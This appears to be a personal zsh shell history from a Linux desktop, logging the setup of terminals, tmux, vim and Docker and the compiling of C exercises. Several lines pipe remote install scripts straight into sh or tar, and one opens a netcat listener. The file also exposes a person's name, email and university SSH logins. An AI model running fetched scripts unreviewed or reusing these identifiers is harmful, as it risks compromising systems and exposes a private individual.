: 1533746344:0;echo $HISTFILE
: 1533746377:0;ls -l $HISTFILE
: 1533746779:0;nano docker-compose.yml
: 1533753313:0;nano /mnt/docker/appdata/letsencrypt/config/nginx/site-confs/default
: 1533753335:0;dcp restart
: 1533754355:0;cd .zsh
: 1533754362:0;wget https://github.com/yardnsm/blox-zsh-theme/blob/master/blox.zsh
: 1533754382:0;mkdir blox-theme
: 1533754388:0;rm blox
: 1533754395:0;rm blox*
: 1533754405:0;git clone https://github.com/yardnsm/blox-zsh-theme
: 1533754550:0;nano .zsh/blox-zsh-theme/blox.zsh
: 1533754591:0;cd Desktop
: 1533754620:0;kill tty2
: 1533754671:0;systemctl stop getty@tty2.service
: 1533754758:0;ps -ft tty2
: 1533754777:0;ps -ft pts/2
: 1533754787:0;kill 5627
: 1533755680:0;echo $fpath
: 1533755697:0;cd ~/.zsh
: 1533755702:0;git clone https://github.com/denysdovhan/spaceship-prompt.git
: 1533756268:0;spaceship_vi_mode
: 1533756274:0;:w
: 1533756416:0;spaceship_vi_mode_enable
: 1533756429:0;spaceship_vi_mode_disable
: 1533757721:0;cd /mnt/docker/appdata/letsencrypt/config/nginx
: 1533757930:0;cd ~/.zsh/spaceship-prompt
: 1533757956:0;nano ~/.zsh/spaceship-prompt/spaceship.zsh
: 1533757971:0;nano lib/hooks.zsh
: 1533757981:0;nano lib/section.zsh
: 1533757993:0;nano lib/utils.zsh
: 1533758183:0;cd blox-zsh-theme
: 1533758251:0;nano ~/.zsh/blox-zsh-theme/blox.zsh
: 1533758427:0;sleep 3
: 1533759016:0;z
: 1533759086:0;cd .zsh/spaceship-prompt
: 1533759111:0;ln -sf "$PWD/spaceship.zsh" "/usr/local/share/zsh/site-functions/prompt_spaceship_setup"
: 1533759114:0;sudo ln -sf "$PWD/spaceship.zsh" "/usr/local/share/zsh/site-functions/prompt_spaceship_setup"
: 1533760070:0;ls ~/.zsh/spaceship-prompt
: 1533760074:0;touch
: 1533760078:0;touch file
: 1533760146:0;echo $SPACESHIP_VERSION
: 1533760161:0;apt list zsh
: 1533760747:0;sudo apt install tmux
: 1533771365:0;sudo apt-get install fonts-powerline
: 1533771786:0;fs
: 1533771787:0;gs
: 1533771863:0;ls .themes
: 1533771876:0;mkdir .fonts
: 1533771915:0;git clone https://github.com/powerline/fonts.git --depth=1
: 1533771932:0;mv fonts
: 1533771942:0;cd fonts
: 1533771969:0;sudo apt purge fonts-powerline
: 1533772342:0;whereami
: 1533772345:0;whoami
: 1533772356:0;ssh
: 1533772389:0;cd /mnt
: 1533772394:0;cd backups
: 1533772398:0;cd docker
: 1533772403:0;rm .Trash
: 1533773207:0;curl http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-demo.txt
: 1533773241:0;wget -O - http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-demo.txt
: 1533773397:0;sudo ./one-dark.sh
: 1533773603:0;python
: 1533773618:0;php -v
: 1533773708:0;sudo apt install cairo
: 1533773718:0;sudo apt list cairo
: 1533773727:0;sudo apt search cairo
: 1533773795:0;sudo apt install -t unstable cairo
: 1533773864:0;sudo apt install libcairo2
: 1533775011:0;sudo apt install termite
: 1533775035:0;git clone --recursive https://github.com/thestinger/termite.git
: 1533775040:0;cd termite && make
: 1533775088:0;sudo apt install vte-ng
: 1533775118:0;rm vte-ng
: 1533775124:0;git clone https://github.com/thestinger/vte-ng.git
: 1533775129:0;cd vte-ng
: 1533775143:0;make install
: 1533775147:0;./configure.ac
: 1533776100:0;git clone https://github.com/jwilm/alacritty.git\
cd alacritty\
cargo install cargo-deb\
cargo deb --install
: 1533776107:0;sudo apt install cargo
: 1533776125:0;sudo apt search cargo
: 1533776139:0;sudo apt install rust
: 1533776183:0;sudo apt install -t unstable cargo
: 1533776242:0;cargo install cargo-deb
: 1533777873:0;rm .vnc
: 1533777947:0;cp .zshrc .tmux.conf
: 1533779556:0;cat .zshrc
: 1533782452:0;rmux
: 1533782786:0;ss
: 1533782791:0;ss -tulpn
: 1533783598:0;gedit .zshrc
: 1533783803:0;nano /mnt/docker/appdata/letsencrypt/config/www/test.html
: 1533784011:0;google search
: 1533784016:0;ddg search
: 1533784028:0;sudo apt install urlencode
: 1533784258:0;fuck
: 1533784401:0;history
: 1533784685:0;apt-list-packages
: 1533784692:0;apt list code
: 1533784713:0;man dpkg
: 1533784755:0;man dpkg-query | grep Installed
: 1533784759:0;man dpkg-query
: 1533784811:0;apt-cache --no-all-versions show $package | grep '^Size: '
: 1533784819:0;apt-cache --no-all-versions show code 
: 1533784853:0;dpkg --list |grep "^rc" | cut -d " " -f 3 | xargs sudo dpkg --purge
: 1533785376:0;tmux new-session -us %u -d\

: 1533785386:0;tmux -u new-session -s %u -d\

: 1533785446:0;tmux new-session
: 1533785462:0;man tmux | grep new-session
: 1533785555:0;tmux -u new-session -d
: 1533785558:0;tmux -u new-session
: 1533785587:0;tmux -u new-session -s %u -d
: 1533785670:0;tmux attach -t %u
: 1533785753:0;sudo systemctl enable tmux@.service 
: 1533785756:0;sudo systemctl enable tmux
: 1533785764:0;sudo systemctl enable tmux@
: 1533785795:0;sudo nano /etc/systemd/system/tmux@.service
: 1533785820:0;sudo systemctl enable tmux@artificial.service
: 1533785833:0;sudo systemctl start tmux@artificial.service
: 1533785873:0;xsel
: 1533786083:0;sudo rm /etc/systemd/system/tmux@.service
: 1533786138:0;sudo rm /etc/systemd/system/multi-user.target.wants/tmux@artificial.service
: 1533786547:0;for i in {0..255}; do\
    printf "\x1b[38;5;${i}mcolour${i}\x1b[0m\n"\
done
: 1533786607:0;gedit .tmux.conf
: 1533786671:0;exit 0
: 1533786803:0;tmux info
: 1533786867:0;nano
: 1533786915:0;hto
: 1533786952:0;dcp up &
: 1533788423:0;./configure
: 1533788589:0;# ZSH Modules {{{
: 1533788589:0;# Loads listed modules:
: 1533788590:0;autoload -Uz compinit promptinit vcs_info color && compinit -i
: 1533788591:0;# Options (((\
\
# Auto-corrects commands:\
setopt correctall\
\
# Prevents command duplicates from being recorded in history:\
setopt hist_ignore_all_dups\
\
# Prevents commands from being recorded if preceeded with a space:\
setopt hist_ignore_space\
\
# Shares the same history with all shells:\
setopt sharehistory\
\
# Expands globbing operator and list all matches found:\
setopt extendedglob\
\
# Appends history\
setopt append_history\
\
# Save timestamp\
setopt extended_history\
\
# Add history immediately after command\
setopt inc_append_history\
\
# )))
: 1533788591:0;# Prompt {{{
: 1533788591:0;# Activates prompt:
: 1533788591:0;promptinit
: 1533788591:0;# Sets 256 color mode:
: 1533788591:0;export TERM="xterm-256color"
: 1533788591:0;# Powerlevel9k Configuration
: 1533788592:0;#POWERLEVEL9K_LEFT_PROMPT_ELEMENTS=(time context root_indicator dir vcs)
: 1533788592:0;#POWERLEVEL9K_RIGHT_PROMPT_ELEMENTS=(status background_jobs)
: 1533788592:0;#POWERLEVEL9K_STATUS_VERBOSE=false
: 1533788592:0;#POWERLEVEL9K_SHORTEN_STRATEGY="truncate_middle"
: 1533788592:0;#POWERLEVEL9K_SHORTEN_DIR_LENGTH=3
: 1533788592:0;# History {{{
: 1533788592:0;# Sets history size:
: 1533788592:0;export HISTSIZE=2000
: 1533788592:0;# Saves history:
: 1533788593:0;export SAVEHIST=$HISTSIZE
: 1533788593:0;# Sets history file directory:
: 1533788593:0;export HISTFILE=~/.zsh/zhistory
: 1533788593:0;# }}}
: 1533788593:0;# Variables {{{
: 1533789292:0;launch firefox
: 1533789305:0;eog
: 1533789473:0;sudo apt install xauth
: 1533789491:0;sudo nano /etc/ssh/sshd_config
: 1533789540:0;sudo systemctl restart sshd
: 1533789556:0;which xauth
: 1533789661:0;firefox
: 1533791162:0;neotop
: 1533791295:0;sudo apt install st
: 1533791563:0;sudo apt install suckless-tools 
: 1533791587:0;whereis st
: 1533791707:0;whereis suckless-tools
: 1533791718:0;man suckless-tools
: 1533791913:0;sudo apt purge suckless-tools
: 1533822382:0;mkdir .tmux.conf
: 1533822390:0;mkdir .tmux
: 1533822403:0;mkdir .tmux/plugins
: 1533822412:0;rm .tmux/plugins
: 1533822519:0;_iostat
: 1533822525:0;sar
: 1533822663:0;ls tmux-resurrect
: 1533822667:0;vim ~/.tmux.conf
: 1533822693:0;vim ~/.tmux.conf &
: 1533823529:0;tmux source-file ~/.tmux.conf
: 1533823614:0;tmux show -g default-command
: 1533824296:0;sudo apt install tree
: 1533824328:0;git clone https://github.com/tmux-plugins/tmux-sidebar ~/.tmux
: 1533824336:0;git clone https://github.com/tmux-plugins/tmux-sidebar ~/.tmux/tmux-sidebar
: 1533824348:0;ls ~/.tmux/tmux-sidebar
: 1533824598:0;ls -1
: 1533824627:0;tree
: 1533824633:0;tree --help
: 1533824744:0;tree -d -L 2
: 1533824807:0;tree -L 2
: 1533824836:0;view
: 1533825002:0;tree -C -L 2
: 1533825027:0;less
: 1533825034:0;tree -C -L 2 | less
: 1533825051:0;man less
: 1533825072:0;cd appdata/letsencrypt/config
: 1533825321:0;tmux -v
: 1533825329:0;tmux --version
: 1533825336:0;apt list tmux
: 1533825848:0;sudo apt install gawk
: 1533825879:0;rm -rf tmux-copycat
: 1533825925:0;git clone -b tmux-23 https://github.com/tmux-plugins/tmux-copycat
: 1533825976:0;caine9.0.iso
: 1533826020:0;ls -l Parrot-security-4.1_amd64.iso
: 1533826092:0;xclip
: 1533826277:0;âƒ¾ƒ¼
: 1533826283:0;whoami 
: 1533826293:0;whoami whoamiwhoami
: 1533826971:0;paste 
: 1533827016:0;sudo apt install pastebinit
: 1533827048:0;pastebinit --help
: 1533827080:0;pastebinit setopt xtrace
: 1533827233:0;setopt xtrace > file
: 1533827244:0;pastebinit -i file
: 1533827332:0;setopt xtrace | pastebinit
: 1533827341:0;setopt xtrace | xargs pastebinit
: 1533827353:0;man setopt
: 1533827359:0;setopt --help
: 1533827397:0;setopt xtrace
: 1533827647:0;list
: 1533827921:0;dcp  --help
: 1533827968:0;dcp  dcp ps
: 1533828050:0;dcp logs
: 1533828165:0;dcp logs -f -t
: 1533838001:0;git clone https://gitlab.com/ArtificialAmateur/dot-files
: 1533838123:0;cat ~/.ssh/id_rsa.pub
: 1533838291:0;git clone git@gitlab.com:ArtificialAmateur/dot-files
: 1533838379:0;cd dot-files
: 1533838387:0;rm zshrc
: 1533838398:0;cp ~/.zshrc ./
: 1533838417:0;mv .zshrc zshrc
: 1533838432:0;cp ~/.tmux ./tmux
: 1533838436:0;cp -r ~/.tmux ./tmux
: 1533838448:0;cp -r ~/.tmux.conf ./tmux.conf
: 1533838464:0;cp -r ~/.zsh ./zsh
: 1533838480:0;ls zsh
: 1533838487:0;rm zsh/blox-zsh-theme
: 1533838494:0;rm zsh/powerlevel9k
: 1533838502:0;rm zsh/zhistory
: 1533838508:0;touch zsh/zhistory
: 1533838532:0;git commit -m "Add tmux and update zsh"
: 1533857603:0;alias
: 1533857621:0;zsh -fd
: 1533857710:0;alias date="date -I'seconds' | sed -e 's/T/ /g'"
: 1533857844:0;host
: 1533858950:0;cd /mnt/docker
: 1533859076:0;tmux new -s 1
: 1533859089:0;tmux new-session -t 1 -s 2
: 1533859553:0;sudo apt install ranger
: 1533859604:0;ranger --copy-config=all
: 1533859702:0;nano commands
: 1533859712:0;nano commands.py
: 1533859749:0;nano rc.conf
: 1533859803:0;sudo install gio
: 1533859808:0;sudo apt install gio
: 1533859817:0;gio
: 1533860550:0;sudo apt install atool w3m mutool 
: 1533860556:0;sudo apt install atool w3m
: 1533860566:0;sudo apt install atool
: 1533860629:0;gedit rc.conf
: 1533860931:0;sudo apt install w3m-img
: 1533863543:0;sudo apt install ffmpegthumbnailer
: 1533863570:0;cd .config/ranger
: 1533863572:0;nano scope.sh
: 1533865983:0;apt search vim
: 1533865988:0;apt search neovim
: 1534007916:0;cat file
: 1534007946:0;uptime
: 1534008001:0;:help
: 1534012321:0;mv Downloads/*.jpg Pictures
: 1534012327:0;ls Downloads
: 1534014377:0;nano .vimrc
: 1534089133:0;man vim
: 1534089358:0;man vimrc
: 1534089662:0;git clone --depth=1 https://github.com/amix/vimrc.git ~/.vim_runtime
: 1534089678:0;sh ~/.vim_runtime/install_awesome_vimrc.sh
: 1534089932:0;rm .vim_runtime
: 1534089937:0;rm .vimrc
: 1534089958:0;trash-empty
: 1534090115:0;mkdir .vim
: 1534090125:0;touch vimrc
: 1534090129:0;git init .
: 1534090141:0;ln -s ~/.vim/vimrc ~/.vimrc
: 1534090153:0;mv .zshrc .zsh
: 1534090174:0;mv .zsh/.zshrc .zsh/zshrc
: 1534090192:0;ln -s ~/.zsh/zshrc ~/.zshrc
: 1534090222:0;mv .tmux.conf ~/.tmux/tmux.conf
: 1534090244:0;ln -s ~/.tmux/tmux.conf ~/.tmux.conf
: 1534090402:0;wget https://raw.githubusercontent/tomasr/molokai/colors/molokai.vim
: 1534090408:0;wget https://raw.githubuserconten.comt/tomasr/molokai/colors/molokai.vim
: 1534090415:0;wget https://raw.githubusercontent.com/tomasr/molokai/colors/molokai.vim
: 1534090455:0;wget https://raw.githubusercontent.com/tomasr/molokai/master/colors/molokai.vim
: 1534090460:0;mkdir colors
: 1534090464:0;mv molokai.vim colors
: 1534090475:0;nano vim.r
: 1534090480:0;nano vimrc
: 1534090724:0;ls ~/.fonts
: 1534090727:0;ls ~/.fonts/fonts
: 1534090883:0;vim ~/bin/pia-nm.sh
: 1534092472:0;mkdir -p ~/.vim/autoload ~/.vim/bundle && \\
curl -LSso ~/.vim/autoload/pathogen.vim https://tpo.pe/pathogen.vim
: 1534104753:0;git submodule add https://github.com/itchyny/lightline.vim bundle/lightline
: 1534104977:0;vim
: 1534105264:0;ls bundle
: 1534105319:0;git submodule init
: 1534106645:0;emacs
: 1534109739:0;vim vimrc
: 1534111207:0;~.
: 1534119829:0;sudo apt purge nano
: 1534119838:0;sudo apt install mg
: 1534119842:0;mg
: 1534121833:0;vim .zshrc
: 1534121872:0;vim .config/ranger/rc.conf
: 1534122122:0;vim .vimrc
: 1534275160:0;nc
: 1534275210:0;nc -l 2389
: 1534453357:0;poweroff
: 1534457868:0;docker-compose ps
: 1534457889:0;docker logs 
: 1534457892:0;docker logs --help
: 1534457914:0;docker logs -f -t
: 1534457920:0;docker logs -ft
: 1534457934:0;docker-compose logs
: 1534457939:0;docker-compose -ft
: 1534457947:0;docker-compose logs -ft
: 1534605263:0;ls bin
: 1534605269:0;nano bin/iommu.sh
: 1534605276:0;cat bin/iommu.sh
: 1534605447:0;touch /home/artificial/bin/hostdev-1b1c:1b05.xml
: 1534605456:0;touch /home/artificial/bin/hostdev-04d9:a0b9.xml
: 1534605460:0;cd bin
: 1534605469:0;vim hostdev-1b1c:1b05.xml
: 1534605705:0;cp hostdev-1b1c:1b05.xml hostdev-04d9:a0b9.xml
: 1534605775:0;mv hostdev-1b1c:1b05.xml attach-vm-mouse.xml
: 1534605785:0;mv hostdev-04d9:a0b9.xml attach-vm-keyboard.xml
: 1534605852:0;virsh attach-device windows /home/artificial/bin/attach-vm-mouse.xml
: 1534605864:0;virsh list
: 1534605868:0;virsh list --help
: 1534605874:0;virsh list domains
: 1534605878:0;virsh list --all
: 1534605895:0;virsh
: 1534605937:0;virsh edit
: 1534605941:0;virsh edit --domain
: 1534605944:0;virsh edit --domain windoew
: 1534605946:0;virsh edit --domain windows
: 1534605949:0;virsh edit --domain Windows
: 1534605978:0;virsh -c qemu:///system list --all
: 1534606005:0;lsusb
: 1534606077:0;vim hostdev-04d9:a0b9.xml
: 1534606086:0;vim attach-vm-mouse.xml
: 1534690570:0;virsh -c qemu:///system attach-device windows /home/artificial/bin/attach-vm-mouse.xml && virsh -c qemu://system attach-device windows /home/artificial/bin/attach-vm-keyboard.xml
: 1534774064:0;virsh -c qemu:///system attach-device windows /home/artificial/bin/attach-vm-mouse.xml
: 1535143083:0;sudo deb -i python3-multibootusb_9.2.0-1_all.deb
: 1535143134:0;dpkg -i python3-multibootusb_9.2.0-1_all.deb
: 1535143154:0;sudo dpkg -i python3-multibootusb_9.2.0-1_all.deb
: 1535143474:0;umount /dev/sde
: 1535145331:0;myip
: 1535348857:0;sha256sum 2018-06-27-raspbian-stretch-lite.zip
: 1535348870:0;unzip 2018-06-27-raspbian-stretch-lite.zip
: 1535358986:0;ifconfig 
: 1535499321:0;sudo bash VMware-Workstation-Full-14.1.1-7528167.x86_64.bundle
: 1535499414:0;sudo apt install wire-desktop
: 1535500321:0;dpkg -i keepassxc_2.3.4-1_amd64_stable_stretch.deb
: 1535500323:0;sudo dpkg -i keepassxc_2.3.4-1_amd64_stable_stretch.deb
: 1535500840:0;cd ~ && wget -O - "https://www.dropbox.com/download?plat=lnx.x86_64" | tar xzf -
: 1535502386:0;sudo bash vpnsetup.sh
: 1535502573:0;echo deb http://repository.spotify.com stable non-free | sudo tee /etc/apt/sources.list.d/spotify.list
: 1535502578:0;sudo apt-get update
: 1535502647:0;gpg --keyserver hkp://keyserver.ubuntu.com --search-key 'Spotify Public Repository Signing Key'
: 1535502668:0;sudo apt install dirmng
: 1535502670:0;sudo apt install dirmngr
: 1535502684:0;sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 931FF8E79F0876134EDDBDCCA87FF9DF48BF1C90
: 1535502691:0;sudo apt update
: 1535502700:0;sudo apt install spotify-client
: 1535502872:0;sudo apt install autoconf automake inkscape libgdk-pixbuf2.0-dev libglib2.0-dev libxml2-utils pkg-config sassc parallel
: 1535502899:0;sudo apt install autoconf automake inkscape libgdk-pixbuf2.0-dev libglib2.0-dev libxml2-utils pkg-config sassc
: 1535502918:0;sudo apt install -t stable autoconf automake inkscape libgdk-pixbuf2.0-dev libglib2.0-dev libxml2-utils pkg-config sassc
: 1535502981:0;sudo apt install -t stable autoconf automake inkscape libglib2.0-dev libxml2-utils pkg-config sassc
: 1535502998:0;sudo apt install -t stable autoconf automake inkscape libxml2-utils pkg-config sassc
: 1535503081:0;sudo apt install git
: 1535503178:0;git clone https://github.com/adapta-project/adapta-gtk-theme
: 1535503196:0;cd adapta-gtk-theme
: 1535503248:0;sudo apt install gdk-pixbuf-2.0
: 1535503262:0;sudo apt install libgdk-pixbuf2.0-dev
: 1535503277:0;sudo apt install aptitude
: 1535503384:0;sudo aptitude install libgdk-pixbuf2.0-dev
: 1535503502:0;sudo aptitude install libglib2.0-dev
: 1535503511:0;./autogen.sh
: 1535503527:0;sudo apt install make
: 1535504083:0;sudo sh -c "echo 'deb http://ppa.launchpad.net/papirus/papirus/ubuntu xenial main' > /etc/apt/sources.list.d/papirus-ppa.list"
: 1535504114:0;sudo rm /etc/apt/sources.list.d/papirus-ppa.list
: 1535504124:0;wget -qO- https://raw.githubusercontent.com/PapirusDevelopmentTeam/papirus-icon-theme/master/install.sh | DESTDIR="$HOME/.icons" sh
: 1535504261:0;git clone https://github.com/powerline/fonts.git --depth=1 ~/.fonts
: 1535504298:0;cd fonts\
./install.sh
: 1535504307:0;cd ~/.fonts
: 1535504312:0;./install.sh
: 1535504815:0;sudo apt install trash
: 1535504818:0;sudo apt install trash-cli
: 1535504832:0;sudo bash one-dark.sh
: 1535504850:0;wget https://raw.githubusercontent.com/denysdovhan/gnome-terminal-one/master/one-dark.sh && . one-dark.sh
: 1535504866:0;. one-dark.sh
: 1535504876:0;man .
: 1535505021:0;chmod +x one-dark.sh
: 1535505023:0;./one-dark.sh
: 1535505030:0;sudo apt install gconf-tool
: 1535505035:0;sudo apt install gconftool
: 1535505257:0;0123456 {} [] , . ; ' 
: 1535505264:0;. --help
: 1535505267:0;.
: 1535505269:0;..
: 1535505280:0;../
: 1535505286:0;.../
: 1535552092:0;sudo apt install htop
: 1535553153:0;ifconfig
: 1535553829:0;nano Documents/win-notes
: 1535554111:0;w3m
: 1535555043:0;ssh ftursi@lokie.ist.unomaha.edu
: 1535556442:0;sudo apt install neofetch
: 1535556453:0;nano zshrc
: 1535556513:0;source .zshrc
: 1535556601:0;rm one-dark.sh
: 1535583804:0;nano Documents/llevel-notes
: 1535589279:0;gedit store.c
: 1535589857:0;man fgets
: 1535592190:0;nano list.txt
: 1535592444:0;gcc -o store store.c
: 1535593865:0;gcc -Wall -std=c1x -o store store.c
: 1535593868:0;./store list.txt
: 1535757474:0;man sprintf
: 1535757593:0;man printf
: 1535771081:0;cat ~/Downloads/changes.patch
: 1535771085:0;nano ~/Downloads/changes.patch
: 1535771142:0;nano Documents/store.c
: 1535771621:0;nano ~/Downloads/store.c
: 1535772106:0;mkdir cybr2250
: 1535772129:0;mv ~/Downloads/store.c cybr2250
: 1535772135:0;ls ~/Downloads
: 1535772151:0;rm store*
: 1535782628:0;./dice-roller
: 1535784738:0;mkdir c-exercises
: 1535784754:0;mv dice-roller* c-exercises
: 1535784757:0;rm list.txt
: 1535784761:0;mkdir notes
: 1535784767:0;mv *notes notes
: 1535784779:0;mv *-notes notes
: 1535785097:0;gcc -Wall -std=c1x -o dice-roller dice-roller.c
: 1535785185:0;nano dice-roller.c
: 1535786609:0;gcc -Wall -std=c1x -o reverse reverse.c
: 1535786621:0;nano reverse.c
: 1535786637:0;cp reverse.c new-line.c
: 1535787275:0;./reverse
: 1535789343:0;gcc -Wall -std=c1x -o new-line new-line.c
: 1535789346:0;./new-line
: 1535789368:0;nano new-line.c
: 1535820266:0;cp new-line.c triangle.c
: 1535821228:0;nano triangle.c
: 1535821546:0;gcc -Wall -std=c1x -o triangle triangle.c
: 1535821547:0;./triangle
: 1535831658:0;sudo apt install libpangox-1.0-0
: 1535832059:0;sudo apt install slack
: 1535832085:0;sudo apt list slack
: 1535832091:0;sudo apt info slack
: 1535832098:0;sudo apt list info slack
: 1535832120:0;apt-cache show slakc
: 1535832125:0;apt-cache show slack
: 1535832141:0;sudo apt purge slack
: 1535832518:0;cd ~/Downloads
: 1535832526:0;sudo dpkg -i slack-desktop-3.3.1-amd64.deb
: 1535832598:0;sudo dpkg -i discord-0.0.5.deb
: 1535832740:0;sudo apt purge slack-desktop
: 1535937129:0;apt list linux-headers-amd64
: 1535937134:0;uname -a
: 1535937167:0;sudo poweroff
: 1535937938:0;who
: 1535937946:0;w
: 1535937953:0;hostname
: 1535938109:0;dmesg
: 1535938110:0;sudo dmesg
: 1535938281:0;sudo apt install firmware-iwlwifi
: 1535938404:0;sudo dmesg | grep failed
: 1536187428:0;scp ./store.c ftursi@loki.ist.unomaha.edu:~/
: 1536187915:0;date
: 1536189432:0;cd c-exercises
: 1536189649:0;gcc -Wall -std=c1x -o pointer-magic.c pointer-magic
: 1536190009:0;nano pointer-magic.c
: 1536190032:0;gcc -Wall -std=c1x -o pointer-magic pointer-magic.c
: 1536190034:0;./pointer-magic
: 1536191078:0;~/.dropbox-dist/dropboxd
: 1536429793:0;nano Documents/notes/win-notes
: 1536439697:0;cat ~/.vimrc
: 1536453311:0;source ~/Downloads/zshrc
: 1536453321:0;cd .vim
: 1536453334:0;cd .fonts
: 1536453366:0;cd .config/libreoffice/4/user/database/biblio
: 1536453388:0;exit 1
: 1536453396:0;tmux attach-session
: 1536453402:0;tmux attach -
: 1536453596:0;test -z "$TMUX"
: 1536453602:0;test -z $TMUX
: 1536453609:0;test
: 1536453662:0;man test
: 1536453766:0;idk
: 1536456927:0;tmux a
: 1536456934:0;tmux a || tmux
: 1536456949:0;tmux attach || tmux
: 1536457038:0;tmux new
: 1536457093:0;sudo apt install alicarte
: 1536457100:0;sudo apt install alacarte
: 1536457316:0;man tmux
: 1536457334:0;tmux new-session --help
: 1536457341:0;man tmux new-session
: 1536457494:0;echo $TMUX
: 1536457734:0;cd .tmux
: 1536457807:0;rm tmux-resurrect
: 1536457811:0;git clone https://github.com/tmux-plugins/tmux-resurrect
: 1536457846:0;rm tmux-sidebar
: 1536457851:0;rm tmux-copycat
: 1536457854:0;rm tmux-yank
: 1536457860:0;git clone https://github.com/tmux-plugins/tmux-sidebar
: 1536457867:0;git clone https://github.com/tmux-plugins/tmux-yank
: 1536457875:0;git clone https://github.com/tmux-plugins/tmux-copycat
: 1536457988:0;/etc/shells
: 1536458464:0;git clone git clone git://git.suckless.org/st
: 1536458688:0;apt search xlib
: 1536458697:0;apt search xlib-dev
: 1536458814:0;sudo apt install libx11-dev
: 1536458851:0;less README
: 1536458865:0;ls /usr/local/bin
: 1536458872:0;ls /usr/local/sbin
: 1536458875:0;ls /usr/local/*
: 1536458924:0;libxft-dev
: 1536458929:0;sudo apt install libxft-dev
: 1536459083:0;aptitude
: 1536459089:0;aptitude install  libxft-dev 
: 1536459093:0;sudo aptitude install  libxft-dev 
: 1536459180:0;tic -sx st.info
: 1536459357:0;git clone https://github.com/alefir/st
: 1536459434:0;sudo make clean install
: 1536462865:0;sudo apt install fwupdmgr
: 1536462946:0;sudo apt install fwupd
: 1536463002:0;sudo fwupdmgr update
: 1536463010:0;sudo fwupdmgr
: 1536463062:0;sudo fwupdmgr get-devices
: 1536463085:0;sudo fwupdmgr refresh
: 1536509716:0;git clone https://github.com/LukeSmithxyz/st
: 1536509843:0;pkill st
: 1536510253:0;cd ~
: 1536510276:0;wget https://gist.githubusercontent.com/vreon/845878/raw/bcd4d53bc7b1efcfcd1349c178e603526fe04c69/.Xresources
: 1536510442:0;nano ~/.Xresources
: 1536510508:0;colors
: 1536510509:0;color
: 1536510529:0;nano ~/.zsh
: 1536510616:0;nano .Xresources
: 1536510917:0;ranger
: 1536512065:0;sudo apt install gcolor2
: 1536512475:0;12
: 1536512712:0;000000000000000
: 1536512742:0;fc
: 1536512758:0;fc-scan
: 1536512798:0;fc-list| grep -i Fura
: 1536540108:0;fc-list
: 1536541090:0;nano st.c
: 1536541156:0;mv st luke_st
: 1536541461:0;cd luke_st
: 1536541850:0;st -f 
: 1536541912:0;fc-list | grep -i Fira
: 1536541965:0;st -f 'FuraMono Powerline:pixelsize=12:antialias=true:autohint=true'
: 1536541975:0;st -f 'FuraMono Powerline:pixelsize=16:antialias=true:autohint=true'
: 1536541993:0;fc-list | grep -i Source
: 1536542010:0;st -f 'Source Code Pro Powerline:pixelsize=12:antialias=true:autohint=true'
: 1536542046:0;st -f 'Source Code Pro for Powerline:pixelsize=14:antialias=true:autohint=true'
: 1536542062:0;st -f 'FuraMono P werline:pixelsize=16:antialias=true:autohint=truE'
: 1536542074:0;st -f 'FuraMono for Powerline:pixelsize=16:antialias=true:autohint=true'
: 1536542082:0;st -f 'FiraMono for Powerline:pixelsize=16:antialias=true:autohint=true'
: 1536543082:0;tmux attach
: 1536544272:0;ls -a
: 1536544408:0;SPACESHIP_VI_MODE_SHOW
: 1536544418:0;SPACESHIP_VI_MODE_SHOW 
: 1536544439:0;SPACESHIP_VI_MODE_SHOW=false
: 1536544620:0;SPACESHIP_VI_MODE_SHOW=true
: 1536544725:0;Q
: 1536544728:0;echo $EDITOR
: 1536545185:0;exec tmux
: 1536545204:0;ls /root
: 1536545207:0;sudo ls /root
: 1536545211:0;sudo ls -la /root
: 1536545230:0;tmux --help
: 1536545282:0;zsh
: 1536545302:0;tmux -f ~/.tmux.conf
: 1536545392:0;sudo su
: 1536545439:0;sudo apt install dmenu
: 1536545445:0;dmenu
: 1536545748:0;tmux list-se
: 1536545948:0;alias TERM=xterm-256color tmux
: 1536545965:0;echo tmux
: 1536545970:0;which tmux
: 1536546025:0;export TERM=screen-256color
: 1536546045:0;export TERM=screen-color
: 1536546118:0;export TERM=xterm-256color
: 1536546265:0;tmux kill-session -a
: 1536546268:0;tmux kill-session
: 1536546305:0;nano .tmux.conf
: 1536546424:0;export TERM=xterm-color
: 1536546894:0;gedit ~/Downloads/zshrc
: 1536546996:0;nano .zshrc
: 1536547012:0;echo $nano
: 1536547017:0;which nano
: 1536547039:0;gedit .zshrc 
: 1536547152:0;launch st
: 1536560287:0;lsx
: 1536560417:0;man diff
: 1536560777:0;diff -q luke_st/config.h st/config.def.h > diff
: 1536560795:0;diff luke_st/config.h st/config.def.h > diff
: 1536560796:0;nano diff
: 1536560830:0;bell
: 1536561056:0;tmux
: 1536561087:0;nano luke_st/config.h
: 1536561139:0;nano st/config.def.h
: 1536589435:0;gedit st-keyboard_select.diff
: 1536589760:0;patch -Np1 -i st-keyboard_select.diff
: 1536589941:0;make clean install
: 1536590613:0;man git init
: 1536590647:0;ls ../luke_st
: 1536592244:0;git clone git@gitlab.com:ArtificialAmateur/st
: 1536592306:0;git config --global user.name "Frank Tursi"
: 1536592323:0;git config --global user.email "theartificialamateur@openmmailbox.org"
: 1536592376:0;git remote rm origin
: 1536592385:0;git remote rm upstream
: 1536592458:0;chmod 600 ~/.ssh/id_rsa
: 1536593593:0;man patch | grep -i
: 1536593599:0;man patch | grep '-i'
: 1536593718:0;ls -la
: 1536593744:0;cp config.h ~/Downloads/config.h
: 1536593753:0;rm -rf ./*
: 1536593811:0;mv config.h ~/Downloads
: 1536593814:0;mv ..
: 1536593825:0;mv st/* ./
: 1536593863:0;nano ~/Downloads/config.h
: 1536594022:0;mv ~/Downloads/config.h ./
: 1536594069:0;mv config.h config.def.h
: 1536594093:0;git commit -m "Clean-up"
: 1536594112:0;mkdir patches
: 1536594371:0;sudo apt install xsel
: 1536594778:0;wget httpsL//st.suckless.org/patches/keyboard_select/git-st-keyboard_select-20180619-937e367.diff
: 1536594787:0;wget https://st.suckless.org/patches/keyboard_select/git-st-keyboard_select-20180619-937e367.diff
: 1536594800:0;cat git-st-keyboard_select-20180619-937e367.diff
: 1536594865:0;nano patches/git-st-keyboard_select-20180619-937e367.diff
: 1536594920:0;git apply -3 patches/git-st-keyboard_select-20180619-937e367.diff
: 1536595028:0;patch -Np1 ../* st-keyboard_select-0.8.1.diff
: 1536595032:0;patch -Np1 st-keyboard_select-0.8.1.diff
: 1536595054:0;nano ../
: 1536595069:0;gedit ../config.def.h
: 1536595151:0;rm config.def.h
